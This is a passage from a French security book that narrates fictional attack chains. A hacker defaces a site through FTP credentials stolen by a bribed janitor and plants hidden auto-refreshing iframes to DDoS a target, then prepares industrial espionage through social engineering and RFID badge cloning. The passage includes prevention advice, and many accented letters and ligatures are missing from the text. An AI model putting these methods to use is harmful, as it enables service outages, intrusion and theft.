"Bon, a parat bien", dit Phnix en essayant de se calmer. Ladrnaline commence monter, ses paumes et son front deviennent moites. Il est maintenant temps de se connecter au site web www.toutpourlordi.com et de remplacer la page par dfaut avec sa version modie. Phnix regarde lhorloge sur son bureau. Il est 5 h 45. "Cest une heure qui en vaut une autre", se dit Phnix. Le trac augmentera peu peu en quelques heures, et www.veritesa.org doit tre inaccessible 8 heures. Phnix dmarre son client FTP. Il feuillette les documents copis par le gardien. Sur la troisime page, il trouve le nom toutpourlordi.com. Juste ct, se trouvent le nom dutilisateur bbking et le mot de passe ngbTyz45opw$. "Bon, au moins le mot de passe est raisonnablement fort", pense Phnix. Il se tourne vers son client FTP et saisit comme nom dhte ftp.toutpourlordi.com, le nom dutilisateur bbking et le mot de passe ngbTyz45opw$, en veillant ne pas faire de faute. Il respire profondment et clique sur le bouton Connexion de son client FTP. Le client FTP fait dler rapidement quelques messages classiques concernant entre autres les donnes binaires, et un signal sonore indique Phnix quil est connect et quil peut voir le contenu du serveur web. "Il ny a pas grand-chose ici, se dit Phnix. Je suppose que toute linfrastructure est stocke sur un serveur plus sr. Je suppose que cest ce vers quoi renvoient les appels .NET et C# LIKE bizarres que jai vus dans le code HTML : un endroit plus scuris."

Chapitre 3

Faire planter le site web de votre concurrent

93

Ces rexions interrompent le processus de pense de Phnix pour quelques secondes seulement. Il rcupre le chier index.html modi sur son bureau et le fait glisser dans la fentre de son client FTP qui afche le contenu du serveur web. Il obtient un message classique : "Ce chier existe dj. Voulez-vous le remplacer ?" Phnix rpond oui et, en un rien de temps, la page principale de www.toutpourlordi.com est remplace par la version de Phnix. "Il ny a plus qu attendre." Phnix sinstalle confortablement dans sa fauteuil, bille largement et stire. Il ouvre la page www.veritesa.org pour voir sil se passe dj quelque chose. La page se charge normalement. Phnix regarde son horloge : il est 6 h 19. "Il ny a probablement pas grand monde qui navigue sur toutpourlordi.com cette heure-ci." Phnix dcide daller prendre son petit djeuner et de revenir voir ce qui se passe une heure plus tard. Aprs un petit djeuner sain chez McDonalds en lisant les journaux, Phnix retourne son appartement. Il est maintenant 7 h 45. "Bon, a devrait bouger maintenant." Phnix vide le cache de son navigateur et ouvre de nouveau la page www.veritesa.org. Celleci se charge, mais elle est beaucoup plus lente quauparavant. Il faut presque 30 secondes avant dafcher quoi que ce soit. Phnix rchit aux raisons pour lesquelles le site nest pas encore tomb. "Il ny a probablement pas tout fait assez de trac cette heure-ci", se dit-il. Phnix se souvient alors que sa dernire douche remonte plus de 24 heures. Il se dirige vers la salle de bains et prend une longue douche chaude. Aprs quelque temps, il sort, se sche et retourne ses ordinateurs. Il essaie une fois de plus de se connecter www.veritesa.org. Le rsultat, illustr la Figure 3.24, indique le succs de lopration. "Gagn !" dit Phnix. Pour sassurer du rsultat, il clique sur le bouton Rafrachir plusieurs fois, puis utilise un autre ordinateur pour aller sur le site web. Il obtient les mmes rsultats. Phnix rchit et entame un nouveau monologue. "Je me demande combien de temps il leur faudra pour comprendre ce quil se passe et comment le rparer. Ils nont probablement pas les comptences en interne pour diagnostiquer le problme ou le rsoudre. Maintenant que jy pense, a leur prendra peut-tre des semaines avant davoir une ide de ce quil faut faire. Changer de serveur et changer les enregistrements DNS ne sera daucune aide : mes iframes font un appel par URL et non par adresse IP, les cadres continueront charger quel que soit lendroit vers lequel lURL rsout. Ils auront du mal tracer lendroit do viennent les attaques car toutes les requtes HTTP viendront de personnes quelconques visitant toutpourlordi.com. Il est probable que ce soit quelquun qui se connecte toutpourlordi.com partir dun rseau scuris gr par une quipe de scurit intelligente qui nisse par dcouvrir le pot aux roses.

94

Chanes dexploits

Figure 3.24
Copie dcran du site www.veritesa.org alors quil est inaccessible.

Il est alors peu probable quils rapportent le problme veritesa.org. Ils bloqueront probablement le site depuis lintrieur ou, sils font quelques recherches sur leurs machines en interne, ils pourraient mme bloquer toutpourlordi.com et considrer le problme rsolu. Si quelquun contactait toutpourlordi.com pour les informer que leur site web est utilis pour lancer une attaque par DDoS envers une association, le problme pourrait tre rsolu. Mais mme dans ce cas, il faudra que quelquun regarde le code HTML pour comprendre ce qui se passe. Les gens de toutpourlordi.com pourraient simplement remplacer mon chier avec loriginal, mais ma version restera quelque temps en cache partout sur le web et dans les navigateurs. Je pense que je peux tabler sur au moins 48 heures de panne pour www.veritesa.org, ce qui rpond largement la demande de mon client. Je suppose que je peux appeler et rcuprer le reste de mon argent maintenant."

Chapitre 3

Faire planter le site web de votre concurrent

95

Autres possibilits Mme si le but premier de Phnix tait de faire tomber www.veritesa.org, il aurait pu faire bien plus de choses pour provoquer des dgts non seulement sur la cible mais aussi sur le site quil a compromis et sur lequel il a ajout les cadres intgrs il aurait pu, sur ce mme site, insrer un lien pointant vers un cheval de Troie personnalis. Et si le code source du cadre intgr avait t un enregistreur de frappe (keylogger) stock par Phnix sur un serveur FTP sur le web ? Naurait-on pas limpression quune entreprise innocente, toutpourlordi.com, a un site web qui tente dinfecter tous ses visiteurs avec un cheval de Troie ? En ralit, ce serait le cas. Que les propritaires du site sachent ou non que Phnix a fait des modications, ils seraient considrs comme partiellement responsables. Certains diront que vous pouvez dsactiver cela sous Internet Explorer et sous dautres navigateurs web. Cependant, dans la plupart des cas, une part importante (voire la majorit) des utilisateurs, voire des administrateurs systme, activent le chargement des contrles ActiveX et des applets Java sans conrmation sous prtexte que les utilisateurs voient cela comme une gne. Du point de vue du vol didentit et de cartes de crdit, les possibilits sont innies. Rsum de la chane dexploits La chane dexploits de Phnix se dcline dans les tapes suivantes : 1. Il a trouv des informations par le biais dune reconnaissance passive qui sest limite, dans ce cas, une simple recherche sur Google. Parmi les informations trouves, il y avait le fait que le site web avait t conu par des lycens et des dtails techniques de mise en uvre. 2. Il a construit un plan dattaque solide par DDoS en utilisant loutil de DDoS Freak88. 3. Il a dcouvert, en continuant sa reconnaissance, que lICMP tait bloqu sur le serveur web cible. 4. Il a ajust son plan dattaque et dcid de faire tomber le site en utilisant du trac HTTP lgitime. 5. Il a trouv une entreprise disposant dune bande passante importante et de beaucoup de visiteurs pour lui servir dintermdiaire pour son attaque. 6. Il a facilement trouv lentreprise responsable des mises jour du site web intermdiaire grce la publicit "conu par" sur la page principale.

96

Chanes dexploits

7. Il a rendu visite lentreprise de conception web pour chercher un angle dattaque dans le but dobtenir les accs au site web intermdiaire. 8. Il a tir prot dun gardien mal pay pour obtenir des documents privilgis lintrieur de lentreprise de conception web. 9. Il a construit un environnement de test pour son attaque. Il a ensuite cr des cadres intgrs dans du code HTML pour appeler plusieurs instances du site web cibl et les rafrachir de manire invisible toutes les cinq secondes. 10. Il a obtenu un accs au site web intermdiaire grce aux informations voles par le gardien. 11. Il a remplac la version originale du site web intermdiaire avec sa version contenant les cadres intgrs. 12. Il a consult la page cible jusqu valider que le site soit inaccessible en raison du trac excessif provenant des visiteurs du site intermdiaire.

Mesures de prvention
Cette section traite de diverses mesures que vous pouvez dployer pour vous protger contre de tels exploits chans. Mesures de prvention pour les informations sur votre entreprise accessibles aux pirates Cette mesure simple consiste tre attentif ce que vous postez ou ce que vous publiez propos de votre entreprise sur le web. Lorsquune information est disponible sur Internet, elle nen disparatra probablement jamais compltement. Cest la nature et le fonctionnement mme dInternet. Il existe dautres mthodes pour obtenir des informations sur la prsence web dune entreprise. Netcraft, par exemple, vous permet de trouver des informations telles que les adresses IP dun serveur web, son systme dexploitation et sa version, voire la dernire fois que le serveur a t redmarr ! Heureusement, vous pouvez choisir de supprimer ces informations en quelques tapes. Assurez-vous de congurer tous vos DNS et vos informations de contact pour quelles soient prives et non publiques, quel que soit lenregistreur de noms de domaine que vous utilisez. La plupart des plates-formes web vous permettent de supprimer, voire de personnaliser ces informations pour dire la face du monde ce que vous voulez quelles

Chapitre 3

Faire planter le site web de votre concurrent

97

disent. La premire question que doit se poser une entreprise ou un salari avant de publier la moindre information est : "Pourquoi cette information doit-elle tre rendue publique ?" Mesures de prvention contre les attaques par DDoS via ICMP Lentreprise cible, sur la suggestion du fabricant de son matriel de pare-feu, a mis en place la meilleure mesure pour viter les attaques par DDoS via ICMP. Dsactiver lICMP sur toutes les interfaces web ou extrieures sur tous les dispositifs est une pratique de scurit lmentaire depuis quelque temps maintenant, mais il est tonnant de voir le nombre dentreprises qui ne suivent pas cette recommandation. Ces dernires annes, les fournisseurs daccs Internet ont commenc dvelopper des mthodes pour minimiser limpact des attaques par DDoS, mais nont toujours pas russi les radiquer. Si votre site web doit permettre des requtes ping depuis lextrieur pour une raison ou pour une autre, des solutions base de scripts ou de pare-feu permettent de bloquer certaines adresses IP si elles dpassent un certain nombre de requtes en un certain intervalle de temps. Cependant, si lattaquant lance une vritable attaque par DDoS (distribue), cette mesure perdra beaucoup de son efcacit. Mesures de prvention contre les attaques par DDoS via HTTP ou dautres protocoles Cette tche est bien plus complexe car vous ne pouvez pas vous contenter dinterdire ou de bloquer certains protocoles. Comment un serveur web peut-il fonctionner en tant que serveur web sil ne permet pas les requtes HTTP ? Comment un dispositif conu pour communiquer sur Internet ou sur un rseau peut-il crer des canaux de communication si TCP (Transmission Control Protocol) nest pas activ ? Il y a plusieurs rponses ces questions. Lune delles est dutiliser ou de crer des piles rseau trs modies et personnalises. Cela est trs onreux du point de vue du dveloppement et de la maintenance, ce qui rserve cette solution aux environnements les plus scuriss. Pour le reste, il existe des technologies telles que la limitation de connexions, qui permet de ne servir quune quantit donne de bande passante ou de connexions par hte distant. Il existe aussi des options de limite de trac sur la plupart des quipements rseau modernes, permettant de limiter certains types de trac. Le ltrage par trou noir envoie tout le trac suspect ou malveillant vers une interface rseau nulle ou inexistante. Cela narrtera pas une attaque par DDoS, mais peut soulager largement dans le cas dune inondation massive sur un type de trac donn.

98

Chanes dexploits

Vous devriez mettre en uvre du ltrage dentre et de sortie (ingress et egress) de votre rseau dentreprise. Ce type de ltrage minimise la probabilit que des paquets usurps pntrent dans votre rseau. Ces solutions posent cependant un problme : elles vont lencontre des raisons pour lesquelles les entreprises mettent en place des sites web. La vision originale du web tait un espace ouvert, libre et facilement accessible. Cest ce que nous avons accompli, et maintenant on nous demande de le scuriser. Cest comme si on construisait un btiment avec 700 portes grandes ouvertes et que lon demandait deux gardes de toutes les protger. Phnix a d faire quelques assertions sur les limitations et possibilits de son site web cible, mais il na fait que supposer quelles ne dpassaient pas les limites de connexion par dfaut du matriel et du logiciel sur le serveur. Les fournisseurs daccs Internet font des progrs pour rduire limpact des attaques par DDoS. Si votre entreprise cherche viter ce type dattaque, les auteurs vous suggrent de contacter votre fournisseur daccs Internet pour lui faire part de vos proccupations. Mesures de prvention contre les modications non autorises de sites web Dans le scnario de ce chapitre, une lourde responsabilit retombe sur lentreprise du site web intermdiaire (toutpourlordi.com) car cette entreprise hberge les cadres intgrs malveillants. Pour les entreprises sous-traitant la modication, la cration et la mise jour de contenu sur leurs sites web, la politique devrait tre de demander des garanties sur la scurit des informations et des explications sur les protections mises en place vis--vis de laccs votre site web. Il est courant de penser, tort, que ne pas enregistrer les informations sous forme numrique les protge des pirates et des personnes malveillantes. De plus, il faudrait mettre en place dautres mthodes de vrication pour les modications dun site web. Il est courant que, lorsque vous sous-traitez ce type doprations, votre organisation doive tre contacte pour autoriser toutes les modications. Cela fait en gnral partie des clauses du contrat. Le problme est de faire respecter cette pratique. Une solution serait dutiliser des mots de passe temporaires, cest--dire une liste prgnre de mots de passe ne pouvant tre utiliss quune seule fois. Cette liste reste la proprit du propritaire du site web (votre entreprise). Pour faire une modication, le sous-traitant doit contacter le propritaire du site web pour obtenir le mot de passe suivant dans la liste. Cela oblige le sous-traitant communiquer avec le propritaire du site web avant toute modication. Cela aurait fait chouer la corruption du gardien par Phnix.

Chapitre 3

Faire planter le site web de votre concurrent

99

Nous oublions souvent quil existait des criminels, des voleurs et des pirates bien avant que les ordinateurs ne ressemblent ceux daujourdhui. Le site toutpourlordi.com a t compromis sans outil technique. Pour scuriser le site web, on pourrait imaginer une authentication obligatoire deux facteurs pour modier toute portion dun site web dentreprise. Si votre site est hberg par un sous-traitant qui ne peut pas fournir ce service, il peut tre sain de chercher un nouvel hbergeur. Si PayPal peut offrir des millions de clients la possibilit dutiliser une authentication deux facteurs pour effectuer des achats, nimporte quel hbergeur devrait tre capable den faire autant pour les clients layant choisi comme prestataire. Mesures de prvention contre la corruption de salaris Lorsque Phnix a approch Greg au sujet du vol des informations de connexion de Benot, il avait dj valu le bureau, il savait quil ny avait pas de camras de scurit et que le placard de Benot navait pas de cadenas. Dans tous les cas, cest souvent une mauvaise ide de stocker les mots de passe sous forme papier 1. Les mots de passe doivent tre stocks sous forme lectronique et protgs par du chiffrage et un contrle daccs fort. Cela signie que Benot devrait conserver ces mots de passe uniquement sur sa station de travail, et que celle-ci devrait tre verrouille. De plus, son entreprise devrait probablement mettre en place une politique de chiffrage obligatoire des disques durs. Un gardien peut gnralement accder toutes les pices nimporte quand ; vous devez prendre des mesures ce niveau galement. Le gardien aurait t bien moins utile sil avait d utiliser une carte magntique pour entrer et si on lui avait dit que tous les accs taient enregistrs. Il aurait su que, en cas de problme, cela aurait t facile de remonter jusqu lui pour un accs un bureau une heure particulire dun jour donn. La sparation des tches et le principe de moindre privilge sont critiques la scurit interne. Par exemple, les gardiens travaillant de jour dans le btiment pourraient arrter leur journe au moment de la fermeture des bureaux et tre remplacs par une quipe de nuit. Ainsi, les gens travaillant de nuit ne sauraient pas ce quil se passe pendant la journe.

1. N.D.T : Tous les experts ne saccordent pas sur ce sujet. Bruce Schneier, en particulier, suggre au contraire de noter vos mots de passe sur papier et de les garder dans un lieu sr : voir http://www.schneier.com/blog/ archives/2005/06/write_down_your.html (en anglais).

100

Chanes dexploits

Conclusion
Lauteur de ce chapitre na, intentionnellement, inclus aucun outil perfectionn pour effectuer un DDoS contre la cible. Certaines attaques parmi les plus brillantes impliquent seulement une connaissance des protocoles et technologies utiliss au quotidien. Phnix a russi sa tche en forant des milliers de gens faire des requtes HTTP GET pour sa cible. En dautres termes, il a forc un ensemble de personnes consulter de manire rpte le site cible. Distinguer cela dun afux de trac serait difcile pour la plupart des gens et, plus important encore, plus difcile arrter une fois lattaque lance. Les attaques par DoS et par DDoS ne sont pas nouvelles, mais la plupart des sites web y sont encore vulnrables. En parlant avec des clients au cours de ces dernires annes, la plupart nont jamais rien fait ce sujet car ils imaginent que cela ne leur arrivera pas. Une attaque classique par DDoS implique dinfecter des milliers dordinateurs et den faire des zombis grce un cheval de Troie qui fait appel un serveur web contrl par lattaquant ou lordinateur de lattaquant lui-mme, ou qui se connecte des canaux IRC pour sintgrer un rseau de robots IRC. Aujourdhui, vous pouvez visiter des centaines de canaux et de sites qui peuvent vous prter quelques milliers ou centaines de milliers de ces robots pour effectuer vos basses besognes. Ils sont dj infects, sous le contrle dun matre, et attendent des commandes pour lancer une attaque. Tout le travail difcile a t fait : il suft un attaquant de se connecter des canaux IRC spciques et de commencer son attaque. Ce problme nest pas prs de disparatre car, comme pour la plupart de nos dfenses, les dfenses contre les attaques par DDoS sont prvisibles et sont facilement contournes. La meilleure dfense est de se tenir au courant des tendances et mthodes actuelles et de faire des efforts de poids au niveau des routeurs de primtre et au niveau du fournisseur daccs Internet de votre infrastructure pour limiter la bande passante et les connexions. Il est aussi utile davoir des domaines alternatifs en place et de pouvoir y dplacer votre site rapidement. Il existe diffrents efforts coordonns cherchant actuellement dvelopper des dfenses contre ce type dattaques. On notera en particulier Prolexic (www.prolexic.com), Radware (www.radware.com) et Top Layer (www.toplayer.com). Ce nest certes pas une liste exhaustive, mais lauteur de ce chapitre a travaill directement avec ces trois entreprises.

4
Espionnage industriel
Scnario
Phnix est lgrement tonn lorsque son portable prpay personnel se met vibrer dans sa poche au bureau. Mais ltonnement laisse immdiatement place lexcitation. Phnix sait que, si ce tlphone sonne, a ne peut signier quune seule chose : il est temps de se mettre au travail et de gagner beaucoup dargent ! Phnix naime pas vraiment son boulot et aime encore moins son chef. Mais Phnix a un secret. Depuis plusieurs annes, il a un second boulot. Un boulot dont il nest pas autoris parler. Et, plus important encore, un boulot illgal. Phnix espionne des entreprises depuis quelque temps dj. Cest amusant, a lui permet daiguiser ses comptences et a rapporte beaucoup dargent. Phnix gagne plus en trois semaines despionnage industriel quen un an en tant quemploy. Il rpond rapidement au tlphone et il entend une voix familire. "Salut, jai besoin que vous me fassiez quelques recherches. OK, rpond Phnix. O et quand pouvons-nous discuter des besoins de mon client ? demande lhomme dun ton pressant. Phnix rchit une seconde. Que pensez-vous de lendroit habituel ? demande Phnix. Ce soir 18 heures", rpond lhomme. Avant que Phnix ne puisse rpondre, lhomme continue : "Sois ponctuel, cette fois, tu avais trois minutes de retard la dernire fois." Phnix sapprte acquiescer, mais

102

Chanes dexploits

lhomme a dj raccroch. Phnix se dit que ce type devrait vraiment apprendre les rgles du savoir-vivre. Phnix a effectu plusieurs missions despionnage industriel pour cette personne au cours des neuf derniers mois. Phnix ne la connat que sous le nom de M. Dobbs et na pas vraiment envie den savoir plus. Il regarde sa montre et voit quil est 16 h 45. Aprs avoir envisag de terminer la documentation sur la scurit des ports du commutateur rcemment install, il change davis, ferme son ordinateur portable professionnel et quitte le bureau. Il sarrte au fast-food du coin et avale un double cheeseburger, des frites et un milk-shake. Il se dirige ensuite vers le centre-ville pour rencontrer lindividu louche qui lui sert de contact et qui lui a dj remis plus de 60 000 en liquide au cours des six derniers mois pour diverses tches. Lorsquil arrive au Starbucks au coin de Madison et Wabash, une heure plus tard, il voit M. Dobbs assis une table dans un coin au fond de la boutique. Phnix sassied, salue M. Dobbs (qui ne lui rend pas son salut), croise les bras et demande : "Bon, quavez-vous pour moi ?" Lhomme explique : "Une entreprise pharmaceutique a un laboratoire de recherches en face de lhpital universitaire de Chicago. Mon client est le plus gros concurrent de cette entreprise. En ce moment, ils travaillent tous les deux sur un mdicament qui vise liminer la plupart des effets secondaires des chimiothrapies administres aux patients atteints de cancers. Mon client est en concurrence directe avec eux, mais ils ont un avantage. Leur mdicament est cens augmenter considrablement le mcanisme de remplacement naturel des tissus du corps, ce qui est intressant parce que la chimio dtruit ncessairement des tissus sains en plus des tissus cancreux. Mon client a annonc la mme chose, mais il est actuellement trs en retard sur les recherches qui rendraient cette afrmation vraie. Nous voulons que tu rcupres toutes les informations possibles, en utilisant tous les moyens ncessaires pour obtenir tous les rsultats de recherches et de tests dans le laboratoire du concurrent. La cible est Alki Pharmaceutique. En outre, nous aimerions quaucune action illgale ne puisse tre trace vers mon client. Jai un disque USB externe dun tra sur lequel tu devras enregistrer tous tes rsultats pertinents. Tu as huit semaines pour cette mission. Je te contacterai dans huit semaines la mme heure. Nous aimerions galement quune attaque technique soit lance depuis Alki vers lhpital en face, si possible en causant la mort de patients qui y sont hospitaliss. Cela distraira lattention dAlki du fait que nous entrons sur le march avec un produit trs proche du leur. Cest tout pour maintenant. Voil le disque." Aprs avoir donn une bote Phnix, lhomme se lve et sort du caf. Lorsque Phnix arrive son appartement, il ouvre la bote, esprant y trouver le disque et le premier paiement habituel de 5 000 . sa grande surprise, la bote contient, en plus du disque

Chapitre 4

Espionnage industriel

103

dur, 25 000 . Sous le disque, il trouve un petit mot : "Le paiement total sera de 150 000 ." Phnix stouffe avec son Red Bull tandis que le nombre 150 000 semble sauter hors du papier pour le frapper. Il pose la note sur son canap et aperoit du texte dactylographi de lautre ct de la carte. Phnix se sent le roi du monde jusquau moment o il lit la n du message : "Paiement total en cas dchec, 5683 Cherry Street." Phnix est paralys. Il reconnat ladresse, cest celle de sa petite amie, Kate. Soudain, il est rattrap par la ralit. M. Dobbs lui a demand de commettre des actes despionnage industriel et de tuer des patients innocents dun hpital pour dtourner lattention de cette action. Sil russit, il sera riche, dun certain point de vue. Sil choue, sa petite amie le paiera de sa vie. Cest pour cela que M. Dobbs se montre si "gnreux". Lenjeu est bien plus lev cette fois. Phnix seffondre sur son canap et envisage dappeler la police. Il sait cependant que cest probablement une mauvaise ide. Vu le genre de personne que semble tre M. Dobbs, contacter la police signerait probablement son arrt de mort ainsi que celui de Kate. Aprs avoir cart cette ventualit, Phnix claircit son esprit et dcide de commencer une reconnaissance passive dAlki Pharmaceutique.
Espionnage industriel Selon la Chambre du commerce des tats-Unis, lespionnage industriel cote au moins 25 milliards de dollars par an aux actionnaires amricains en pertes de proprit intellectuelle. Ce chiffre date de 1999. Une enqute mene par PricewaterhouseCoopers et lAmerican Society for Industrial Security a montr que les mille plus grosses entreprises des tats-Unis avaient perdu plus de 89 milliards de dollars en 2003. Ce chiffre tait estim plus de 100 milliards en 2007. Une chose est claire : lespionnage industriel implique beaucoup dargent et cela va en augmentant. Il fut un temps o lentreprise qui disposait des meilleurs ouvriers, du plus grand nombre douvriers et des meilleures ides gagnait toujours. De nos jours, cela se rsume lentreprise qui possde le plus dinformations, car nous vivons lge de linformation. Des termes sophistiqus comme "collecte dinformations concurrentielles" peuvent sembler lgaux ou thiques, mais au final ils se rsument une seule chose : lespionnage industriel. Dans ce chapitre, vous suivrez une personne qui a un emploi stable mais qui, en dehors des heures de bureau, utilise les mmes comptences que dans son mtier pour accomplir des tches plus sombres, voire compltement illgales. Ces activits externes vous donneront une ide de la manire dont est organis lespionnage industriel. La plupart des entreprises sont vulnrables sur des points auxquels elles nont mme jamais pens. Dans ce chapitre, lattaquant vous prsentera quelques outils de piratage de pointe ainsi que des techniques prouves.

104

Chanes dexploits

Approche
Phnix va utiliser une mthodologie dattaque classique pour pntrer dans lenceinte et dans le rseau dAlki Pharmaceutique. Il va commencer par une reconnaissance passive classique : fureter ici et l, traner autour du campus dAlki, faire un peu dingnierie sociale de base. Il espre que cela lui fournira un moyen daccder physiquement au laboratoire. Une fois lintrieur, il pourra commencer semer les graines dune attaque labore et complexe. Il choisira un bouc missaire dans lentreprise pour porter le chapeau de son attaque et des attaques de dni de service (DoS) quil pense lancer contre lhpital. Puis Phnix commencera chercher dans et en dehors de linfrastructure dAlki pour localiser les informations demandes par M. Dobbs. Une fois les informations localises, Phnix utilisera une combinaison doutils de pointe et de vieux standards pour passer les mcanismes de protection et rcuprer le tout.

Chane dexploits
Cette section dtaille chaque tape de la chane dexploits de Phnix, y compris :
m m m m m

la reconnaissance ; obtenir les accs physiques ; excuter les attaques ; organiser la panne lhpital ; les autres possibilits.

Cette section se termine par un rsum de la chane dexploits. Reconnaissance Cest dimanche aprs-midi et, plutt que de regarder le match Bears/Saints, Phnix a dcid de commencer sa recherche dinformations sur Alki. Il sassied son ordinateur et dmarre Firefox. Au dmarrage de Firefox, Google safche. Phnix saisit son premier critre de recherche : intext:"alki pharmaceutique". Cette requte renvoie comme rsultats toutes les pages contenant les mots "alki pharmaceutique". Le premier rsultat est bien sr le site web de lentreprise. Il y jette un coup dil rapide, consulte les quelques liens dinformations et regarde la page des offres demploi. "Rien dintressant ici", soufe-t-il. Les offres concernent principalement des emplois au dpartement des ressources humaines et des chercheurs. Un rsultat sur Google semble

Chapitre 4

Espionnage industriel

105

intressant : une tude dune entreprise spcialise dans les logiciels pour la recherche pharmaceutique. Alki a apparemment achet cette solution logicielle et ralise des "conomies considrables" suite sa mise en uvre. Phnix se connecte au site web du fournisseur et tlcharge toute la documentation technique et les messages de la base de connaissances sur le site dassistance. En parcourant tout cela, il dcouvre que le serveur de lapplication attend les connexions sur le port 4580 et envoie des donnes sur le port 4581. Phnix lance ensuite une requte sur le forum de la base de connaissances la recherche de messages demploys dAlki. Il ne sait pas si les gens disent o ils travaillent sur le forum, mais cela vaut le coup dessayer. Et il trouve plusieurs messages dun des administrateurs systme dAlki qui se plaint de ne pouvoir installer le logiciel correctement que sur une installation de Windows 2003 Server sans SP1 et sans les mises jour de scurit. Une personne chez le fournisseur rpond au message avec un "nous travaillons sur un correctif" typique. Phnix copie toutes ces informations dans un rpertoire de son disque dur nomm Recon. Le lendemain, au moment o Phnix se prpare quitter le bureau, il ressent une envie irrsistible de commencer le boulot de M. Dobbs. Malgr la gravit de la tche et le fait que sa vie et celle de Kate soient en jeu, le pirate sent lexcitation monter en lui en y pensant. Il sort du btiment et se dirige vers la gare, un pt de maisons plus loin. Lorsquil monte dans le train, le mlange dodeurs deau de Cologne, de sueur et de produits dentretien lui rappelle pourquoi il prfre souvent le taxi aux trains et aux bus. Lendroit o se rend Phnix est trente minutes en train. Il place les couteurs de son lecteur MP3 dans ses oreilles et choisit sa liste de morceaux prfre dans le menu. Me Against the World de Tupac le revigore. Phnix se rend sur le campus dAlki. Il se demande quelle est la taille de lentreprise et son regard tombe sur le plan de la ligne au-dessus de la porte. "La vache, pense-t-il, ils ont leur propre arrt dans le rseau de transports." Le train roule un certain temps avant que Phnix nentende : "Prochain arrt, Alki Pharmaceutique, 59 e rue." Phnix sort de la gare et est immdiatement impressionn par la taille du campus de lautre ct de la rue. "Il doit y avoir des milliers de personnes ici, a fait beaucoup de cibles potentielles", se dit-il. Il regarde sa droite et remarque un caf branch. Il dcide de sy installer pour rchir sa prochaine action. Il entre et demande un caf latte au comptoir. Aprs avoir command et rcupr sa boisson au bout du comptoir, il sinstalle dans un fauteuil et sort son ordinateur portable spcial. Pendant que Linux dmarre, il parcourt le caf des yeux et remarque quelque chose de trs intressant : presque tous les clients du caf semblent tre des employs dAlki !

106

Chanes dexploits

Ils ont tous leurs cartes daccs RFID (Radio Frequency IDentication, identication sur frquence radio) en vidence, autour du cou sur un cordon ridicule ou sur leurs poches munies dun clip. "a doit tre une ert darborer cette carte", se dit Phnix. Il se remmore alors une exprience lors de la Black Hat 07. Il avait vu une prsentation sur le manque de scurit du RFID. Le confrencier avait russi copier les informations dune carte RFID en moins de deux secondes 1,5 mtre de distance. Il avait ensuite branch son portable lappareil quil avait utilis pour copier les informations, connect un lecteur de cartes RFID USB et excut un script Python pour copier les informations sur une carte vierge, ce qui a donc permis de cloner de manire efcace et rapide une carte daccs un btiment ou une salle linsu dune victime. Phnix griffonne une note propos des cartes RFID dans le caf et sintresse une femme dge mr qui semble avoir une certaine importance au sein dAlki. Elle a lair davoir des soucis pour se connecter au rseau WiFi du caf. Phnix sapproche pour laider : "Bonjour, vous avez un problme pour vous connecter ? demande-t-il. Oui, lui rpond la femme sduisante. Je peux vous aider", indique Phnix avec un sourire. Il jette un il au portable et saperoit que linterrupteur carte WiFi nest pas activ. Il rectie cela discrtement, ouvre une ligne de commande pour lancer ping et traceroute (principalement pour impressionner la femme). Une fois quil a reu les rponses de yahoo.com, il lance Internet Explorer et est accueilli par la page par dfaut, celle dAlki Pharmaceutique. "Ouah, sexclame-t-elle. Merci beaucoup ! Je mappelle Thomas, au fait, dit Phnix. Je mappelle Linda, et vous venez de me sauver la mise, rpond la femme en souriant. Pas de problme, dit Phnix. Jaurais pu appeler lassistance, mais les gens de notre service informatique sont des idiots, sexclame Linda. a serait bien davoir des gens comme vous capables de rsoudre rellement les problmes. Linda sassied et attend la rponse de Phnix. Ben, commence Phnix, il parat que cest trs difcile dobtenir un poste chez vous. Je suis directrice nancire dAlki et vice-prsidente de cette entreprise, sourit Linda. Si vous voulez un job et si vous tes comptent, faites-moi signe.

Chapitre 4

Espionnage industriel

107

Phnix rchit un moment et rpond : Je viens gnralement ici trois ou quatre fois par semaine. Peut-tre que nous pourrons en reparler loccasion. Je viens ici tous les jours cette heure-ci, rplique Linda. Jespre vous revoir bientt. Nous pourrons en parler plus longuement. Je dois rcuprer des rapports maintenant que jai obtenu laccs Internet." Phnix retourne sa table, respire profondment, sirote son latte et se dit quil a trouv un norme lon sans rellement forcer son talent pour linstant. Pntrer dans le btiment grce un entretien dembauche pourrait savrer trs prcieux pour avoir une ide de lagencement du complexe et pour valuer la solidit de la scurit de lentreprise. Phnix commence immdiatement vrier lhistoire de Linda. Ds quelle nest plus en vue, il dmarre Firefox, va sur www.sec.gov et clique sur Filing & Forms. La Figure 4.1 illustre www.sec.gov, un site o il peut trouver les rapports nanciers et autres informations enregistres par les entreprises cotes en bourse.

Figure 4.1
Documents dentreprise enregistrs sur www.sec.gov.

108

Chanes dexploits

Phnix cherche Alki Pharmaceutique sur la base EDGAR. Il obtient une longue liste de chiers HTML et texte. Il clique sur le premier chier HTML et sourit lorsquil atteint la section Filed By, signe du nom Linda Becker. Il sait maintenant que Linda est able. Quelques jours plus tard, Phnix retourne au caf et attend larrive de Linda. Il a dj command le lecteur de cartes RFID dont il a besoin sur rdiot.org. Son scanner de cartes est bien cach dans la poche de son blouson, il est prt. La Figure 4.2 montre un scanner de cartes RFID achet chez rdiot.org.

Figure 4.2
Scanner de cartes RFID achet chez rdiot.org.

Obtenir un accs physique ce stade, Phnix sait que laccs physique sera soit trs simple, soit quasi impossible. Arm de son scanner RFID, il espre pouvoir rcuprer sans effort les donnes de la carte daccs de Linda. Alors que Phnix envisage de se lever et daller remplir de nouveau sa tasse, il voit Linda entrer dans le caf. Il se rassied rapidement et attend quelle arrive. Elle se dirige tout droit vers Phnix. Avec un grand sourire, elle demande joyeusement : "Comment allez-vous aujourdhui, jeune homme ? Bien, et vous-mme ?" rpond Phnix en lui renvoyant son sourire. Linda sourit et rplique "Grosse journe au bureau, mais en dehors des trucs habituels, tout va bien." Phnix remarque la carte daccs de Linda attache la poche de son pantalon. Il sait, daprs les tests quil a mens chez lui sur sa propre carte daccs, quil

Chapitre 4

Espionnage industriel

109

